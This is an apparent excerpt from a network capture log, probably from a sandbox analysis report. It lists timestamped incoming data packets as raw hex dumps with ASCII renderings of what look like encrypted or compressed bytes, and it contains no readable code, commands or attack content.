e8 df 7d 62 23 2f af 6e 05 b4 05 5b aa 68 28 21 37 48 78 Data Ascii: 4E[0e\pX]d*+C}DChmcF}fu9z_UYsbLc $<hE-E6Wd#2L\],n}W;RT~#&&{&t+ts%gWU':SvH$\sSogx}b#/n[h(!7Hx
2021-11-24 14:07:32 UTC	107	IN	Data Raw: e8 6c ba 86 be bb 64 27 b4 7f fe 87 e7 5c 9d 2d 27 b3 b7 52 58 6f 89 61 3d b6 b1 0f cb 0f d9 1a d0 a7 3f 04 6b dd 34 eb 6e 3f 83 13 17 37 1e 8c cc 89 46 63 69 fa 0b 99 35 28 1e 9e 7b 4a 62 2a 98 92 88 38 44 23 4f 09 c0 46 29 c8 e0 6d 1b 25 24 1c 31 9f 82 54 d2 72 7e 69 a7 ef 70 7f 93 84 e4 f1 07 eb 1f 16 7e 1c 8d ae d0 27 3a 01 2c e5 34 40 88 de 8b 61 87 ae a0 7e 87 8e 8a 73 98 07 ed f7 5e 8f 5c 1c 01 94 c8 cf 06 a5 75 16 f6 4f 7b 62 79 8b 21 1d eb b9 50 e6 d6 a3 53 89 81 fe 7d 3f 68 ff 9e 10 25 d2 1a e5 77 a6 0d 0a 5b a2 8e 78 23 d7 75 b2 2c 93 ff cb 41 9b 3d f6 e1 9c 13 4d 69 83 c0 d3 59 95 5e 84 c2 53 79 a3 12 63 50 07 3a 78 a0 8f 7e 3f 8b 79 66 99 c9 80 32 30 c5 97 30 b8 43 75 78 fd 0d 7b f2 08 ae 81 00 8c c6 8a 11 46 43 97 0c b8 dc 0b e8 c2 b0 a8 9e Data Ascii: ld'\-'RXoa=?k4n?7Fci5({Jb*8D#OF)m%$1Tr~ip~':,4@a~s^\uO{by!PS}?h%w[x#u,A=MiY^SycP:x~?yf200Cux{FC
2021-11-24 14:07:32 UTC	108	IN	Data Raw: d5 dc 8a 29 27 41 1e fc 82 27 a8 17 93 ea d8 7a 62 c4 11 af 6e 0d 25 e1 55 2c 02 b3 df b2 3c 68 76 51 1f be 5b 3c a6 70 8a 36 29 aa fc 9f ac a8 8f 12 4b c4 15 32 38 14 5f 19 3e 72 74 e2 24 38 8a dd ff 1e 53 3d a6 ea 74 cc ce c3 e0 32 c6 bf 90 06 8d a9 5a e6 5c 2c 1e 1a 31 28 ef a4 f0 c0 9e a4 78 ff 18 6e c5 db 26 fe 86 58 94 38 78 0b cc 91 8b 36 14 3e f3 e9 b1 95 69 ea 23 be 92 05 33 85 6a e0 38 25 fb 24 04 47 29 69 d7 9a 96 66 27 82 2a 7f 86 36 2d 01 01 0f f7 45 36 4b 2d 6d 49 fe b2 db 46 f5 73 b2 c1 d4 4b f0 f9 8f fa 6e 85 9d 6c de 90 26 b3 93 9a 24 a5 0d 51 96 9a 96 73 b4 81 52 6c dc 12 3b dc 6e ba 70 cb 32 47 b4 e1 13 e4 ad f3 c0 3e 8c 5b 6c 9e 41 67 d7 a4 53 28 b4 c0 3e d0 b7 a9 a1 97 a9 54 11 46 72 0f d9 5f 4d d3 f9 dc da 92 d4 55 76 26 26 fc 26 49 Data Ascii: )'A'zbn%U,<hvQ[<p6)K28_>rt$8S=t2Z\,1(xn&X8x6>i#3j8%$G)if'*6-E6K-mIFsKnl&$QsRl;np2G>[lAgS(>TFr_MUv&&&I
2021-11-24 14:07:32 UTC	109	IN	Data Raw: 20 7b be 9c 2d bc 4e da 1a 74 f6 76 08 f8 d1 00 0d 6e 75 ee a7 26 d0 0e 7b 58 80 e6 41 9c 9b 74 cf 22 b3 bd 33 25 51 b5 95 b4 e7 4c 7e 0d 67 3c e2 b8 37 db d8 6e fd 79 1f c0 84 32 fb 6c b0 5f 05 10 d2 b6 5d c9 7d 52 5a d4 57 95 15 f2 65 c0 42 3a 97 3d b2 d3 85 93 7b 06 25 cc 55 a7 56 d0 ca c3 72 42 e6 8f ef ff dc 25 a8 f9 b9 6b c1 90 78 d2 f7 7b 97 17 1a ea a5 ef 33 6e 1f 40 c3 d4 5a 8e 4d 97 57 39 eb 94 ef 42 9b b6 4f a1 b3 bb 21 62 5c f5 55 8c 0c 17 32 09 ba 4a 2a df 9f 61 48 ab 36 91 94 13 6c c2 3b 35 e5 70 fa e2 f3 36 02 2d 68 04 91 eb 7e cd 89 6b 39 c7 2b 89 c9 f4 ef 50 ee 73 b5 f4 69 18 50 a0 b6 76 42 70 d7 d8 e4 d9 28 2e ff 92 4f 44 15 59 08 a1 ec 11 1e 1d c9 d3 33 f8 ca e4 6e ea 8f 0c 71 36 e6 16 32 96 87 74 0d fb 05 c0 ea 82 8a f1 8e f1 2d f8 d2 Data Ascii: {-Ntvnu&{XAt"3%QL~g<7ny2l_]}RZWeB:={%UVrB%kx{3n@ZMW9BO!b\U2J*aH6l;5p6-h~k9+PsiPvBp(.ODY3nq62t-
2021-11-24 14:07:32 UTC	111	IN	Data Raw: 0e eb 23 34 49 ed 10 76 a4 d2 fd 5d 6c 78 46 ab 01 a8 b0 51 37 c3 d0 20 b3 74 6b 78 39 ee fc 91 92 c7 8e 0c f2 71 7c ef 4e bb 01 7b 5f ff cf ed ed 03 a2 16 38 d8 14 36 27 86 3d 2e 31 d1 67 7d 7b 29 23 86 50 10 8d 23 eb 35 a8 fd 5a 9f 26 37 09 2e fd f7 c1 1c be 34 62 34 70 72 84 53 c3 e7 98 ba bf 69 de 14 88 da 97 2a 86 57 52 49 54 07 15 e6 9e d1 05 a2 a3 cd 4b 9c d8 4b 29 d1 be ec 28 ca a2 5e 8e 8a f9 3c cf 1a 62 3f 57 82 37 b1 0b 82 3a 4a be a6 d8 00 2a 7b 23 26 12 f0 0c 50 5c 73 7e 8b 07 eb d8 84 7a 55 b9 89 2e 6d e1 f3 7f 19 65 89 62 c3 cd 44 d6 2e 1b cb 02 11 10 3c 10 fa 22 e4 e3 a8 ae 3c 7c 85 e3 15 75 35 fb 0f 9b 90 69 62 c6 52 0d e6 30 ad f6 a9 ad b3 65 5b 2c 8f fb 95 ed d2 a6 38 dd 76 45 67 10 b3 86 bb 37 8c b1 5c e5 f3 85 63 97 21 23 c2 82 37 54 Data Ascii: #4Iv]lxFQ7 tkx9q\|N{_86'=.1g}{)#P#5Z&7.4b4prSiWRITKK)(^<b?W7:J{#&P\s~zU.mebD.<"<\|u5ibR0e[,8vEg7\c!#7T
2021-11-24 14:07:32 UTC	112	IN	Data Raw: 4b c6 66 f7 cb 78 e4 4b f0 d4 04 59 ad f1 4e 46 0f c9 7f a4 44 8f 48 f8 5a b1 1d 09 b4 25 25 ca 5b 14 70 03 d6 0f 5d 47 33 c7 95 80 81 cb 9d b7 5b eb 4b 51 2a 4b 3d b8 02 9d b0 b8 ff 34 0e b6 52 7b 86 53 af 49 b0 7d f7 7d 04 44 52 27 e0 61 52 76 60 c6 13 e3 a6 53 3f 9d d4 29 0f 5c f3 2d 5d 49 86 5c aa 7b 28 c6 1b 29 aa 21 81 50 b5 cc 1a c6 db 4f 26 93 51 4f c0 23 96 57 db cb 95 82 0f 87 1c 44 28 e5 b7 b7 12 0b 37 3b 26 26 29 ca f5 24 40 96 bb 82 74 32 0e 31 28 32 a2 0c f6 ca 4c 72 66 b2 9d cd 19 a9 d2 34 17 6b e8 ad 86 84 eb f9 57 73 6d d0 a5 ad 49 b7 ea 29 0f 76 37 76 8d e1 b0 58 5e c9 4d f0 f9 b6 0f 64 47 d6 66 a6 e8 63 28 ab be 32 1a 60 53 4c 19 ca 4c 4c 85 69 20 f6 aa 5c 6d 3d 0f 2e 46 ea 87 ed 63 53 03 49 ef b1 66 6f 20 a5 8c 9b be d0 16 da 58 56 36 Data Ascii: KfxKYNFDHZ%%[p]G3[KQ*K=4R{SI}}DR'aRv`S?)\-]I\{()!PO&QO#WD(7;&&)$@t21(2Lrf4kWsmI)v7vX^MdGfc(2`SLLLi \m=.FcSIfo XV6
2021-11-24 14:07:32 UTC	113	IN	Data Raw: 0b 13 12 41 49 40 9c d3 8f 32 a3 eb 03 10 a4 81 61 6f e6 43 a3 1a cf cd dd 74 c3 12 3c f6 9d 32 4a 71 14 3c 61 6b de 82 68 26 6b fb fb 97 bb 15 e9 11 c9 7f 4f 98 97 ab 58 d1 85 03 1f d7 da 3d d3 2b 77 c4 78 57 3d b7 d2 aa 9e 09 50 7e 17 d3 60 23 b9 c4 8b 3d 7a c1 3e 14 be 95 b0 60 db 60 22 08 c3 38 b1 75 9f 3d c0 f4 ad 1a 53 bb 9c 2f 13 a2 31 d8 4c fa a3 47 e0 72 cd 04 b9 24 ff eb 23 84 e1 3e 54 98 26 e0 aa f8 8e 52 99 1e 29 ef 4e a8 14 b4 0f 6b 74 d4 06 0a f8 2e 32 ba c8 10 1f df d9 23 5f 23 d9 61 0a b9 8d 03 09 62 8e 3f 6c 06 90 02 e8 c8 a3 5d 7d 11 38 48 fe 1c c1 e1 61 27 bd 8a 3b 1f 99 57 a5 ef 91 77 74 20 47 0e 14 f6 1a 6f 2a 1f 4c 8b f6 49 e7 85 4a 60 69 42 80 44 27 4d 82 7f 8c 38 e9 e1 99 42 15 87 fd d6 33 68 23 ad bc c7 16 c4 68 cd ad 1a 89 ce f4 Data Ascii: AI@2aoCt<2Jq<akh&kOX=+wxW=P~`#=z>``"8u=S/1LGr$#>T&R)Nkt.2#_#ab?l]}8Ha';Wwt Go*LIJ`iBD'M8B3h#h
2021-11-24 14:07:32 UTC	114	IN	Data Raw: 42 15 58 d9 ec c7 8f c7 bb 94 1a 40 6f 6a 86 b5 6f cd 01 8f 02 74 f2 26 40 2a b8 c3 65 e8 71 bf 68 1b a3 17 f8 4e 50 9b e2 e5 37 13 37 0a 2e 65 c1 26 31 3b 81 46 0a 27 96 b6 fe a2 91 8b 1c 1e a8 8c a6 88 25 97 24 4b 7a 30 13 3e 0e 99 51 d9 25 d0 d3 d4 7d a0 c6 9f ca e9 2d 5b 74 29 94 c4 99 66 7e ca 54 3d 9c 13 88 46 23 47 11 d2 7f f0 7c 8d 55 a7 a5 37 94 0c 90 65 60 a0 c0 b3 14 35 41 43 23 d2 e5 9e 9e a2 81 e8 32 30 61 84 2f 20 91 d3 d6 4d 84 17 3d db 4b 16 1a 1d 16 c1 e5 b3 8d f2 86 27 5c 95 6b ed 98 78 f2 ee d6 80 aa 04 af a7 fe 62 67 c5 75 c5 1f 34 45 1c 57 76 a3 95 3e 86 2c 00 82 53 e0 2c 62 5f 46 a5 90 bc a7 80 d3 2a 83 f0 f5 92 83 29 0d ab fc fe ad 2a 32 7b b6 bd 76 2d 80 7a 75 26 be 51 25 7c 5a 28 19 7f 4b 67 15 71 ff 2b f7 16 50 05 63 72 3b d1 57 Data Ascii: BX@ojot&@eqhNP77.e&1;F'%$Kz0>Q%}-[t)f~T=F#G\|U7e`5AC#20a/ M=K'\kxbgu4EWv>,S,b_F)*2{v-zu&Q%\|Z(Kgq+Pcr;W
2021-11-24 14:07:32 UTC	115	IN	Data Raw: c1 ae 5d c2 e8 db ce d9 28 99 cb 16 42 c6 25 00 c2 f3 f6 43 e3 b1 43 32 b3 8e f6 c6 7b 95 6d 01 90 15 8d 95 3c 1a 7d 2b 7d d2 34 4e 56 c6 11 11 c5 36 7c 99 b3 1f a2 c1 c1 72 b1 f5 3f 45 ac ec 9e 9c 21 c3 64 f2 b8 60 36 30 b9 cc 03 b9 89 f8 bb 61 9c 1e c3 e4 3d d8 58 b6 36 e5 c1 5f fa 8b 58 b4 cb 96 8f 62 70 cb 32 47 af 2f b6 9b ee 26 c8 40 e0 40 a9 de c5 a7 15 96 9a ad ed e1 c7 d3 b3 a0 a5 d0 a1 5a 21 06 49 c5 26 d0 d7 3f 2f 08 22 8b 67 9b 42 88 79 02 f8 97 ce 02 6e 00 f3 27 2c 51 9d d8 02 7a d4 aa 6e e3 5d d5 d6 a4 76 5b 80 e4 f0 f9 96 f1 9e 5a ca aa 2d a2 6e 1d c6 97 bc 96 a3 be ed ed 80 54 5b b2 1e 59 60 ea 6c 68 3d 66 b6 a2 d3 e4 4d 9c e5 2f cd 31 d8 a7 63 97 43 9e 0e 39 10 f6 4d b5 86 f4 bd ae e6 e4 8e 89 fb a8 db b3 d8 4b a2 84 19 21 5d b2 a4 9e 5e Data Ascii: ](B%CC2{m<}+}4NV6\|r?E!d`60a=X6_Xbp2G/&@@Z!I&?/"gByn',Qzn]v[Z-nT[Y`lh=fM/1cC9MK!]^
2021-11-24 14:07:32 UTC	116	IN	Data Raw: 87 8a df da 23 d1 1a 01 9c b5 8a 3e 0d 1b 79 f7 17 4b 8f 1c 2b c7 91 9c d2 bf 07 dd ea 51 c7 8a 84 5c 1d aa 5a 78 53 59 22 77 22 f6 a1 f4 1a fa 57 1e f3 da 80 b4 18 f9 e4 5a 60 4b 5b ef 81 39 98 48 60 17 7e 9f fd b2 82 ce e4 a3 ec 14 e1 72 be a4 ac b2 d2 3e 42 eb aa 9d 2f 2b 1d 2d ca 73 fb 7d 93 73 89 35 4e bc 78 5b f0 37 6e 3f 2e eb 6d 9d 6f ae 11 23 7f 89 06 df c0 b6 d1 a1 2b 7a d3 43 f0 96 86 e5 be 6b 97 f3 d6 2f 23 67 e3 6f 9e e6 cc 88 ea a8 ba 44 93 ae 18 c1 a0 89 61 5c b8 a4 d6 96 c6 81 5a 5e 47 34 a4 9f d7 bc 7f 9a 78 ac ef e9 a7 4e 36 af 03 01 04 a8 57 e3 f9 5d e2 82 53 2b 06 b4 7a d4 a0 6f d2 f6 24 3d d6 fb 58 d6 3c 54 6a f2 a2 91 7b 65 51 94 a7 08 70 06 c9 e8 fa 10 a8 77 d1 33 70 9e 48 91 06 f2 cc 19 14 5f 78 bc a9 14 9c 1f db 80 4c 2b 2b 80 b9 Data Ascii: #>yK+Q\ZxSY"w"WZ`K[9H`~r>B/+-s}s5Nx[7n?.mo#+zCk/#goDa\Z^G4xN6W]S+zo$=X<Tj{eQpw3pH_xL++
2021-11-24 14:07:32 UTC	118	IN	Data Raw: df f6 32 0e b9 f5 4b 39 1c 8e 66 cd 4c 88 9f 0e 1c a0 d3 80 68 b0 ae d4 80 0a 0d 6d 88 29 43 21 4c 35 78 75 b1 b9 e0 f8 8a b6 b5 df c9 03 44 67 60 95 9f 2f e4 37 bd 0e 6b 13 d7 5b f4 39 89 a9 c4 8f 1a 5e 92 54 12 eb 57 a2 ca 2a 92 89 5f e4 20 7a 40 42 2d 14 3d 85 44 ca 5d f6 3d 5b e8 66 08 8b d1 ab 4f bd 48 3d 08 15 9e d3 18 45 80 61 52 22 d0 cb 06 6a 58 89 a6 c3 f4 29 8f 52 16 f8 32 ee fd 32 df ac 8f 62 36 17 42 50 57 f0 4c b4 cf d5 dd dc fb a6 02 71 a8 e0 52 27 43 d4 17 c8 e2 7e e1 37 94 97 27 e7 10 61 fa f0 9f 21 2b b0 b9 54 d3 25 62 7b 6d 80 72 b0 11 dc 88 32 45 42 94 14 fa d8 db 04 14 ba bd 32 92 fe a3 24 40 00 e3 07 55 7f e3 4f 11 8f 66 f9 5e 5e a2 6e 93 65 24 03 74 d8 06 69 c6 9a 21 79 02 0e 45 ef 7e fa a3 9c cb 0a e9 8f 74 6b fa 89 8b a7 ba fd 6d Data Ascii: 2K9fLhm)C!L5xuDg`/7k[9^TW*_ z@B-=D]=[fOH=EaR"jX)R22b6BPWLqR'C~7'a!+T%b{mr2EB2$@UOf^^ne$ti!yE~tkm
2021-11-24 14:07:32 UTC	119	IN	Data Raw: a3 13 52 41 a2 f7 7f 54 63 57 b5 91 93 5c 9f e0 6c 6c 6c 8b 39 11 a9 0f e3 c4 7d 12 5a 29 9f fa fb 6a 48 5f 80 ae 49 e6 d1 d7 8d ca bb 12 94 9e 08 85 2a 3b 20 28 11 0b 6f 69 f7 b4 04 eb b8 a2 86 44 77 d5 0f 82 d4 6e 7a 9e 4f 71 93 bd 52 2a 05 12 e3 43 0f c6 f1 be a5 31 97 a1 6a e0 4c 08 cf 55 0c ff b6 0f d0 09 8f 8e c4 45 cc 10 6d 8a 77 f1 d4 43 80 1a 05 4b 2a 92 f8 b9 ec 09 4e de 06 3e f0 80 af 7b ac 38 e6 96 7c 2f ea b0 9a 6f 34 17 f2 1f 2f 70 59 98 b5 c9 99 b6 81 be 02 03 8d 01 da 87 8e 43 0b bb 0a 2c 0c 77 17 da 23 d1 45 7a 48 c0 91 4e 97 11 a6 93 ad f6 e0 d8 36 f2 b2 d1 ac e7 b7 a2 7b 38 0f 21 db 5f 13 fb 86 53 53 6b 54 04 62 93 b1 f0 df 71 a8 43 8f 32 25 7a 8c 12 0e 01 7b d4 aa 96 6b f6 70 1a 9b 43 06 13 a9 20 01 e3 43 69 0b 70 36 c2 70 94 61 fd 18 Data Ascii: RATcW\lll9}Z)jH_I; (oiDwnzOqRC1jLUEmwCK*N>{8\|/o4/pYC,w#EzHN6{8!_SSkTbqC2%z{kpC Cip6pa
2021-11-24 14:07:32 UTC	120	IN	Data Raw: 60 f1 85 c0 86 42 56 fd 13 8b 43 09 0d 09 f7 8e 82 90 c3 58 48 b7 1b cd 1f 48 84 40 33 08 11 19 81 2e e0 3f f6 b4 03 b9 66 51 f8 46 3d ce 4b 99 5c 0e ee 7c 19 65 f7 9b d7 26 f8 00 e7 a3 b9 8f 8a 71 59 88 96 48 3b e6 be 2f 97 7b 9a 6a b8 1f 8c e2 ed e0 c7 91 3c dd 5b dc d9 1b b1 60 23 93 ff b8 9d 19 d7 7e 5b da 88 50 11 a0 ed b2 c2 82 4d e3 9c 7d 53 10 d0 86 89 ba 1d 90 d0 25 02 a1 30 c6 a9 3b 05 03 40 15 18 99 1a 00 c5 96 eb 13 d0 bf 87 11 81 d9 ec 5a 8d e4 14 bf f1 d3 d9 a9 ba 16 0d 48 c2 c4 6d 2b b1 23 71 d7 22 86 51 92 bb 05 e8 7d b1 f2 ff 77 22 b4 cf cf 5e 73 34 24 63 83 25 78 73 7a bf 51 7e 5b bf da 98 1c 79 81 b2 e0 fd 74 ae 09 d2 51 10 c4 ea 96 c5 02 b2 15 d0 c5 e4 36 81 90 e4 ce 85 a3 14 3f 0d 2f 4f e7 6b 0c e8 58 c4 c4 e7 c1 1b a4 b0 53 e4 51 e7 Data Ascii: `BVCXHH@3.?fQF=K\\|e&qYH;/{j<[`#~[PM}S%0;@ZHm+#q"Q}w"^s4$c%xszQ~[ytQ6?/OkXSQ
2021-11-24 14:07:32 UTC	122	IN	Data Raw: 2c 57 0d f5 f9 7b c4 aa e3 a1 ed db 29 5b 1c 5b 17 67 89 0c 68 0e 61 b2 06 91 d5 5d 04 8a 8f d6 34 66 eb 37 a8 01 e3 71 85 c4 a4 2e ae 4b 13 27 78 e9 ff e3 a0 c6 55 a3 24 63 d9 03 3a dc 5f d3 56 19 6b f7 a9 71 b3 41 8e df ad 2d 7b c5 54 a6 1b 3e 91 68 27 c8 66 8c cf a4 a1 49 d7 f0 22 ce 68 a3 71 1a 72 17 82 c9 07 af 07 ca fc 52 67 6d 7d 49 b9 02 08 c5 eb 4b 10 eb 56 92 6a 64 7f 6f 5f 51 cb c5 ec 8f ba c2 91 f8 a1 d4 79 89 69 37 49 a3 88 80 f2 26 84 92 81 b3 af 19 68 ec 60 3e ea ef 59 f9 a7 9e a8 6c 08 c2 8d 1c 02 20 84 26 98 b0 3a 3c 0c 44 65 49 56 0b f2 4a 07 57 a7 75 63 7c 9c ab d7 1d 2d 5b 13 db 78 23 36 19 ed 2c ea 00 30 a8 c9 d6 5b 32 b0 c0 ca bc 2b c4 d2 35 fe c6 20 b4 af 9e f8 a9 b5 9d 3d da a2 4e 74 0a 18 b7 21 40 cf 4a 93 62 61 7f 3c 19 aa 43 e0 Data Ascii: ,W{)[[gha]4f7q.K'xU$c:_VkqA-{T>h'fI"hqrRgm}IKVjdo_Qyi7I&h`>Yl &:<DeIVJWuc\|-[x#6,0[2+5 =Nt!@Jba<C
2021-11-24 14:07:32 UTC	123	IN	Data Raw: 7d 7f b9 2b a1 5d 15 43 1b 59 d1 66 3e fb b1 04 7c cd d1 53 64 3f f8 b4 cc d5 07 77 d6 d8 f1 db 6b 86 03 77 b1 18 37 71 d4 09 4b 31 f7 ed 42 74 9e 1a 6e d4 1c a2 da c4 28 ee 95 7f bc b0 3d e5 67 41 91 ed ae 16 89 3b e7 ce d9 56 c0 42 b9 fd 49 dc a7 66 ca 5f 5b ff cb 80 5d f3 49 30 be 9f fa fd 03 a4 d3 3b 27 0a b6 0b bd 56 26 15 ae 2b dc 23 43 15 38 ef b6 c0 8c 45 08 56 f9 6c d5 62 1b a3 52 00 59 1f 7c d7 d3 ce 8b b7 a5 ba 50 70 03 bd 9f fc 04 23 a7 42 b8 6b 0e 95 b5 c7 e4 14 c3 90 38 6f c6 f0 0b 5c 86 a7 3b f3 9a ef 8d 23 ff f1 6b 08 b0 36 6e a9 a4 39 eb 3a 16 37 19 d3 25 6c 91 26 3f 88 6b 30 11 6b fb 38 a9 7d af ea d8 3a 50 2d 49 75 0d c1 f9 84 21 5d f6 a3 c5 72 77 75 ea 17 34 ef 2a cc 60 4e 4a 99 ea 0e 61 8e 58 ef f4 5f 0a c6 f5 4d 43 28 3f 95 49 90 c9 Data Ascii: }+]CYf>\|Sd?wkw7qK1Btn(=gA;VBIf_[]I0;'V&+#C8EVlbRY\|Pp#Bk8o\;#k6n9:7%l&?k0k8}:P-Iu!]rwu4*`NJaX_MC(?I
2021-11-24 14:07:32 UTC	124	IN	Data Raw: a8 70 0c d9 de c6 d2 ad 5c 3e de dc bc 11 05 74 4e d3 47 d1 da d2 d8 f6 3a 3f a1 d3 74 b8 43 76 42 d6 39 39 b0 b6 8f 81 e8 e0 2b f1 d3 10 a4 f8 04 0f 59 94 da fc a1 0f d0 bb de 4f 40 b0 17 4d 72 e5 fe 94 cf e9 c5 e1 56 c3 03 b9 d2 73 53 3d 98 b9 55 a2 13 de a7 83 6e e8 ac bb 93 bc f5 ae 56 25 3b dc d8 27 74 6b 5e 1a 1a d9 1c 16 c3 87 7d 26 7b 5a 69 f7 9b 6c cc cf cb 62 52 c9 a3 bc 4e 8c 8e 2b 55 cb 25 ee fd 71 56 f1 0b ff 02 ab 57 e2 a2 b7 6b 38 18 4f f0 e1 ab 97 b0 cb 69 37 3a 80 00 dd 7f b1 12 42 83 76 db 49 cd 08 b1 35 37 66 cc bb 98 17 db b1 c0 04 75 5f 3c 21 51 d4 8e 6b 74 e2 db e2 6b b7 f9 3e 7e 9c 92 20 1b 33 c5 15 9c 2f c2 39 be 71 99 d6 d5 c2 70 49 9a 50 49 4a b4 02 30 7b ed d0 85 b2 93 33 fd f9 a5 d4 ea be 5b 72 44 fa 32 90 85 8f 2d 9f df 9d f5 Data Ascii: p\>tNG:?tCvB99+YO@MrVsS=UnV%;'tk^}&{ZilbRN+U%qVWk8Oi7:BvI57fu_<!Qktk>~ 3/9qpIPIJ0{3[rD2-
2021-11-24 14:07:32 UTC	125	IN	Data Raw: 77 be c4 0a 9b a0 86 3f aa d8 27 4d 35 88 1f 90 4a 17 ee e3 a7 54 70 4d a4 66 a3 de 8e bd 91 c6 d4 37 71 a7 55 a9 5a 48 d5 11 dd 45 d7 c9 39 8e 33 aa 37 fa 61 f8 a7 f3 3e 27 91 39 60 e2 a7 f7 3f 4f 85 0e d4 87 84 22 63 bb f6 c5 b6 8c 79 d5 00 13 b8 c4 15 54 e7 c6 8f a9 98 7b 7a 98 22 39 05 ae 0e 6a 2f 46 9b 6e 30 69 09 26 ed 80 fe 54 81 42 1c 0a 0e 67 73 fc 35 d6 14 50 e2 33 76 28 b7 3c 51 e3 08 62 88 28 bc d0 bf 5d 3c 4f 35 f6 a0 43 76 3c 50 01 85 9b f3 ef 23 2c b2 f5 7c a7 3a 5d 84 3d 68 69 18 68 6d 7f 03 d5 8a 44 27 a7 39 b3 c5 e3 23 c4 56 27 e4 a0 d6 4b ce 96 c1 91 f3 e6 b3 60 01 eb 25 da c4 ab d2 7f fd d8 f0 6b 7d 28 e6 13 eb 75 ad 53 7f 47 36 e9 66 ca c3 f0 84 3b 2f c3 30 e4 39 f1 5c af 2e 8d 01 41 07 1c 85 d6 2c 07 a7 ed 9c a4 d8 84 8f 5e 11 2b d6 Data Ascii: w?'M5JTpMf7qUZHE937a>'9`?O"cyT{z"9j/Fn0i&TBgs5P3v(<Qb(]<O5Cv<P#,\|:]=hihmD'9#V'K`%k}(uSG6f;/09\.A,^+
2021-11-24 14:07:32 UTC	127	IN	Data Raw: 46 c7 1d ad 1f 52 8f 87 02 f9 39 71 96 a9 24 50 2c 5d 29 c1 f6 83 d3 78 1b d1 3e 0c f8 c3 fe ad 56 c0 d4 06 41 98 5f a2 1d 1e 8a 2e 5f ff fa 85 be 93 01 2a fe 71 f3 19 eb 5a 22 f2 b1 23 91 6c 2f 3a ef 98 2f f0 6d cd ba 7e 24 ae 96 31 00 75 6a 84 f0 b6 ec ba df 61 b3 8a e2 e6 f5 79 55 fa b9 3c 3e 42 31 01 78 af af 93 dc 86 8b 47 55 c7 67 71 9e e4 09 1f a3 bf 43 82 c5 eb 7b fe df 04 df a3 e9 b7 97 db 59 65 31 01 d3 3f 3e eb cc d4 4a f8 8b da 51 29 d3 d2 13 3d 4b 46 90 c7 55 ca 2d 76 e8 e2 60 11 5d f2 aa c4 62 c4 6e 45 8f 18 18 87 c6 da a4 ff 12 97 5a ce 93 50 46 ce 33 85 af 03 3d c2 fe 2d 74 ee 5a 90 ed af 5d a5 54 f2 42 e3 55 3b d5 a1 78 d3 7e 62 6a e0 c9 1d c7 9d 34 6b 63 bf 45 dc 4a 4c 95 93 e6 fe 33 62 fb ad 1e 34 8e 96 90 9d cb fb 28 f6 a6 af fc 1e 4d Data Ascii: FR9q$P,])x>VA_._*qZ"#l/:/m~$1ujayU<>B1xGUgqC{Ye1?>JQ)=KFU-v`]bnEZPF3=-tZ]TBU;x~bj4kcEJL3b4(M
2021-11-24 14:07:32 UTC	128	IN	Data Raw: 2d 4a 97 2e 51 b4 12 20 7f 6b 16 3e bb 3d 76 32 c4 8d 5c a2 ac 60 f8 bb 6b ab 40 4d 97 eb 7a f9 28 66 db b4 1c 6a 6f 9d 14 e8 46 7e 8f 90 05 0d 14 8e cc 3d 41 20 4f 7b 55 d2 a7 d9 d4 c9 7c 89 f0 07 f8 95 74 56 49 78 05 00 cd 04 fc 17 f8 2c a9 58 d1 c2 67 73 97 60 70 7d dd ad ca 64 5a b8 a6 92 3e 9e 08 ae 81 e8 e1 bd 20 65 c0 09 3e 00 33 2e 18 c3 29 26 79 4f 92 a3 e0 52 4e 2a 93 79 c0 d7 ec 38 c4 fa 2d 51 1a c8 a4 c4 06 5f b9 5d ac 77 42 f0 3b d8 23 5f 81 00 d2 b6 8e 5f 30 52 f3 00 d1 d2 ad 13 82 b1 d0 ac c2 0c 9b c5 34 c1 04 60 62 a8 24 66 e8 97 a2 d8 81 37 6c 4a 2b 20 7a 6d ac 72 fc 63 4a 80 ab d1 16 81 56 4d 09 3b e3 d3 be ee d3 c4 a8 21 18 49 46 30 1d 79 60 32 84 55 32 3b 7e 08 25 ca c9 92 cb 9b 9d c4 a1 1b 63 82 b4 40 b9 75 c5 d3 e3 ac 8d 55 b7 e8 e9 Data Ascii: -J.Q k>=v2\`k@Mz(fjoF~=A O{U\|tVIx,Xgs`p}dZ> e>3.)&yORN*y8-Q_]wB;#__0R4`b$f7lJ+ zmrcJVM;!IF0y`2U2;~%c@uU
2021-11-24 14:07:32 UTC	129	IN	Data Raw: db 0b 8d 4d a0 22 8a 83 4c ab 9e a9 ac 76 77 66 61 a4 30 09 eb 89 be cc ea 40 bc 72 47 1d 2c 07 6f 36 89 9a ce a4 15 09 d1 42 0a 39 ef 20 62 4c 1b 39 cb e7 1b 5a 30 d5 a2 b9 d1 15 97 46 49 b0 a0 a6 ac 39 42 d6 d6 bc 8d f3 55 2d 7f cb 5e 32 dd de 12 c6 47 95 8d ac 6e 0d 56 e7 f3 91 ce 2f e0 bb 08 b1 0a 52 7d c3 4c f9 cc 25 47 50 8b 09 42 33 1c ef e1 d2 b1 95 07 02 44 db 2a d1 ef 64 e9 95 6c cf 6c b9 6c 63 11 1f df f0 b8 9b ed c1 82 dd 6f 82 4a 47 40 52 4e e5 61 10 e7 67 27 c8 d2 ab 93 77 d0 65 99 e0 5b a5 e4 2b 45 1f 93 95 56 ea 57 a8 6c 50 fb 30 cd 31 06 c9 9e 88 41 b8 7f bd c9 46 20 96 af 01 24 6b 1f 1b 43 a0 72 c6 f1 f9 9b 43 26 a9 b0 16 6b 03 ac 1e 5e de 0e 51 b4 a4 09 a3 a7 4a 7d 26 c3 f5 88 ad 6b 08 f6 aa 21 9b a7 13 72 e9 8c 61 75 f9 4d fa a8 96 af Data Ascii: M"Lvwfa0@rG,o6B9 bL9Z0FI9BU-^2GnV/R}L%GPB3D*dlllcoJG@RNag'we[+EVWlP01AF $kCrC&k^QJ}&k!rauM
2021-11-24 14:07:32 UTC	130	IN	Data Raw: d0 e2 c8 76 0e 93 95 ea 83 fa 27 4f 7b ca b4 25 ba a8 3d 02 cf 51 a9 90 d4 3d 49 95 af ec db ba 15 ed 89 84 a0 c2 53 98 d0 59 20 60 95 b0 b7 33 85 c2 f6 c5 9f 44 67 20 83 e1 f8 34 c1 b5 76 de f9 2e 9e 2c 85 bb 0d ab bf 84 b8 07 62 d8 f8 91 6b b5 ce 63 f1 83 5b 07 db e2 a7 ea ad dc 6c 93 ac 63 bb 55 17 2c 59 ed 59 a3 61 c4 dd a0 3a c5 ae e2 89 55 a0 3d d4 b2 df 12 10 32 98 35 61 b3 23 32 47 24 6a 16 d3 c6 a2 c9 8d 94 22 93 34 b1 1d 2a 4d 53 28 3f 95 92 93 a3 30 2d 2c 2e 38 53 a5 8d f0 97 cb 5c da 72 cb 03 ab cb aa 89 d9 db 07 d8 